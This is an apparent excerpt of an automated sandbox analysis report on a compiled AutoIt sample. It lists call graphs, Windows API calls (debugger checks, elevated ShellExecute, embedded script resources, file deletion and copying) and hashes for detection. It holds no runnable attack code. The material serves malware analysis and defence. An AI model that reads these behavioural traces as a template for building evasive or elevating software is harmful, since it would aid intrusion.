111627->111616 111627->111619 111627->111624 111627->111625 111627->111626 111629 467962 111628->111629 111630 420db6 Mailbox 59 API calls 111629->111630 111631 467970 111630->111631 111632 46797e 111631->111632 111633 407667 59 API calls 111631->111633 111632->111498 111633->111632 111726 4560c0 111634->111726 111636 45618c 111636->111498 111637->111523 111638->111523 111639->111498 111640->111537 111641->111527 111642->111500 111643->111498 111644->111510 111645->111534 111646->111534 111647->111534 111648->111519 111649->111504 111650->111519 111652 4677ca 111651->111652 111667 4678ea 111651->111667 111653 4677e2 111652->111653 111654 46780a 111652->111654 111656 467821 111652->111656 111653->111654 111657 4677f2 111653->111657 111655 420db6 Mailbox 59 API calls 111654->111655 111661 467800 Mailbox _memmove 111655->111661 111658 420db6 Mailbox 59 API calls 111656->111658 111670 46783e 111656->111670 111665 420db6 Mailbox 59 API calls 111657->111665 111658->111670 111659 467877 111663 420db6 Mailbox 59 API calls 111659->111663 111660 467869 111662 420db6 Mailbox 59 API calls 111660->111662 111664 420db6 Mailbox 59 API calls 111661->111664 111662->111661 111666 46787d 111663->111666 111664->111667 111665->111661 111672 46746b 59 API calls Mailbox 111666->111672 111667->111549 111669 467889 111673 405a15 61 API calls Mailbox 111669->111673 111670->111659 111670->111660 111670->111661 111672->111669 111673->111661 111674->111565 111675->111575 111676->111575 111677->111573 111678->111574 111679->111581 111680->111587 111681->111575 111683 467736 111682->111683 111684 420db6 Mailbox 59 API calls 111683->111684 111685 46773d 111684->111685 111688 465b7a 111685->111688 111687 467780 Mailbox 111687->111595 111689 407e4f 59 API calls 111688->111689 111690 465b8d CharLowerBuffW 111689->111690 111692 465ba0 111690->111692 111691 4079f2 59 API calls 111691->111692 111692->111691 111693 465baa _memset Mailbox 111692->111693 111695 465bda 111692->111695 111693->111687 111694 
465bec 111697 420db6 Mailbox 59 API calls 111694->111697 111695->111694 111696 4079f2 59 API calls 111695->111696 111696->111694 111700 465c1a 111697->111700 111702 465c39 111700->111702 111721 465ab6 59 API calls 111700->111721 111701 465c78 111701->111693 111703 420db6 Mailbox 59 API calls 111701->111703 111706 465cd7 111702->111706 111704 465c92 111703->111704 111705 420db6 Mailbox 59 API calls 111704->111705 111705->111693 111707 407667 59 API calls 111706->111707 111708 465d09 111707->111708 111709 407667 59 API calls 111708->111709 111710 465d12 111709->111710 111711 407667 59 API calls 111710->111711 111718 465d1b _wcscmp 111711->111718 111712 407bcc 59 API calls 111712->111718 111713 423606 GetStringTypeW 111713->111718 111714 407924 59 API calls 111714->111718 111716 42358a 59 API calls 111716->111718 111717 465cd7 60 API calls 111717->111718 111718->111712 111718->111713 111718->111714 111718->111716 111718->111717 111719 465ff0 Mailbox 111718->111719 111720 408047 59 API calls 111718->111720 111722 42362c GetStringTypeW _iswctype 111718->111722 111719->111701 111720->111718 111721->111700 111722->111718 111723->111627 111724->111627 111725->111612 111727 4560e8 111726->111727 111728 4560cb 111726->111728 111727->111636 111728->111727 111730 4560ab 59 API calls Mailbox 111728->111730 111730->111728
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d$w
                                                                                        • API String ID: 0-2400632791
                                                                                        • Opcode ID: c8bba2e69ec25531c3dc7a931015b6887904fe1b36055717e2fc713ccce9aab6
                                                                                        • Instruction ID: 608a7f673b0f79dc2a4d1cbffbee4955f98bf535f1149b945969a973192e74ac
                                                                                        • Opcode Fuzzy Hash: c8bba2e69ec25531c3dc7a931015b6887904fe1b36055717e2fc713ccce9aab6
                                                                                        • Instruction Fuzzy Hash: C0C1473195C3C0AECA35672B4C1DB7B3A746B61B30F4C0A96F5569A0F3E7249C079632

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                          • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                                                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                                                                                          • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                                          • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                                          • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                                                                                          • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                                                                                          • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                                          • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                                          • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                                                                                          • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                          • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                          • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                          • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                          • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                                                                                          • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                        • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                                                                        • API String ID: 529118366-2806069697
                                                                                        • Opcode ID: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
                                                                                        • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                                                                                        • Opcode Fuzzy Hash: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
                                                                                        • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 004049CD
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                                                                                        • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                                                                                        • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1986165174-0
                                                                                        • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                                        • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                                                                                        • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                                        • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                                                                                        • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                        • String ID: SCRIPT
                                                                                        • API String ID: 3051347437-3967369404
                                                                                        • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                                        • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                                                                                        • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                                        • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: pbL$%I
                                                                                        • API String ID: 3964851224-1578263234
                                                                                        • Opcode ID: 7152a0fd736f42cd8f2ab3e45c1d2167de7eabf0c22f3f90728c385b0a10e59f
                                                                                        • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                                                                                        • Opcode Fuzzy Hash: 7152a0fd736f42cd8f2ab3e45c1d2167de7eabf0c22f3f90728c385b0a10e59f
                                                                                        • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                                                                                        • API String ID: 0-2838938394
                                                                                        • Opcode ID: 2c35b3d26c95a021f08b930a365da4d97caa2da8ff1c5750d170567e5b24b5e9
                                                                                        • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                                                                                        • Opcode Fuzzy Hash: 2c35b3d26c95a021f08b930a365da4d97caa2da8ff1c5750d170567e5b24b5e9
                                                                                        • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046448B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                        • String ID:
                                                                                        • API String ID: 48322524-0
                                                                                        • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                                        • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                                                                                        • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                                        • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                                                                                        • timeGetTime.WINMM ref: 00410D16
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00410E61
                                                                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                                                                                        • DestroyWindow.USER32 ref: 00410F06
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                                                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                                                                                        • TranslateMessage.USER32(?), ref: 00445C60
                                                                                        • DispatchMessageW.USER32(?), ref: 00445C6E
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                                                                                        • API String ID: 4212290369-1082885916
                                                                                        • Opcode ID: 960a913c870402787ac0fe9eb6a7f9fa71df31c1dc3d5a98095aae0afc7fb667
                                                                                        • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                                                                                        • Opcode Fuzzy Hash: 960a913c870402787ac0fe9eb6a7f9fa71df31c1dc3d5a98095aae0afc7fb667
                                                                                        • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFreeLast
                                                                                        • String ID:
                                                                                        • API String ID: 1762890227-0
                                                                                        • Opcode ID: b1be601fbf50d16c385c702461778f16e3131c5f805d66f977c4c8bd94c65e50
                                                                                        • Instruction ID: 3eb38364edb325e9b52197d1c86a55cb5ee878b88f872cd9553e5efc53fd1357
                                                                                        • Opcode Fuzzy Hash: b1be601fbf50d16c385c702461778f16e3131c5f805d66f977c4c8bd94c65e50
                                                                                        • Instruction Fuzzy Hash: 56F1F83094C3C1AEDB36576B4C4977A3BA06F72770F5C0A86E56D960F2DE6C8C05D226

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1129 469155-469205 call 431940 call 420db6 call 40522e call 468f5f call 404ee5 call 42354c 1142 46920b-469212 call 469734 1129->1142 1143 4692b8-4692bf call 469734 1129->1143 1148 4692c1-4692c3 1142->1148 1149 469218-4692b6 call 4240fb call 422dbc call 422d8d call 4240fb call 422d8d * 2 1142->1149 1143->1148 1150 4692c8 1143->1150 1151 46952a-46952b 1148->1151 1153 4692cb-469387 call 404f0b * 8 call 4698e3 call 42525b 1149->1153 1150->1153 1154 469548-469558 call 405211 1151->1154 1188 469390-4693ab call 468fa5 1153->1188 1189 469389-46938b 1153->1189 1192 4693b1-4693b9 1188->1192 1193 46943d-469449 call 4253a6 1188->1193 1189->1151 1194 4693c1 1192->1194 1195 4693bb-4693bf 1192->1195 1200 46945f-469463 1193->1200 1201 46944b-46945a DeleteFileW 1193->1201 1197 4693c6-4693e4 call 404f0b 1194->1197 1195->1197 1205 4693e6-4693eb 1197->1205 1206 46940e-469424 call 468953 call 424863 1197->1206 1203 469505-469519 CopyFileW 1200->1203 1204 469469-4694f2 call 4240bb call 4699ea call 468b06 1200->1204 1201->1151 1208 46952d-469543 DeleteFileW call 4698a2 1203->1208 1209 46951b-469528 DeleteFileW 1203->1209 1204->1208 1225 4694f4-469503 DeleteFileW 1204->1225 1211 4693ee-469401 call 4690dd 1205->1211 1222 469429-469434 1206->1222 1208->1154 1209->1151 1220 469403-46940c 1211->1220 1220->1206 1222->1192 1224 46943a 1222->1224 1224->1193 1225->1151
                                                                                        APIs
                                                                                          • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                                                                                          • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                                        • __wsplitpath.LIBCMT ref: 00469234
                                                                                          • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                                                                                        • _wcscpy.LIBCMT ref: 00469247
                                                                                        • _wcscat.LIBCMT ref: 0046925A
                                                                                        • __wsplitpath.LIBCMT ref: 0046927F
                                                                                        • _wcscat.LIBCMT ref: 00469295
                                                                                        • _wcscat.LIBCMT ref: 004692A8
                                                                                          • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                                                                                          • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                                                                                        • _wcscmp.LIBCMT ref: 004691EF
                                                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                                                                                        • _wcsncpy.LIBCMT ref: 004694C5
                                                                                        • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                        • String ID:
                                                                                        • API String ID: 1500180987-0
                                                                                        • Opcode ID: dafe4648b5bbac87b0fd5884d323520927b6c8dc5856a1245f48faeb858b36b7
                                                                                        • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                                                                                        • Opcode Fuzzy Hash: dafe4648b5bbac87b0fd5884d323520927b6c8dc5856a1245f48faeb858b36b7
                                                                                        • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                        • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                        • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                                        • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                                                                                        • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                                        • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                        • RegisterClassExW.USER32(00000030), ref: 0040309E
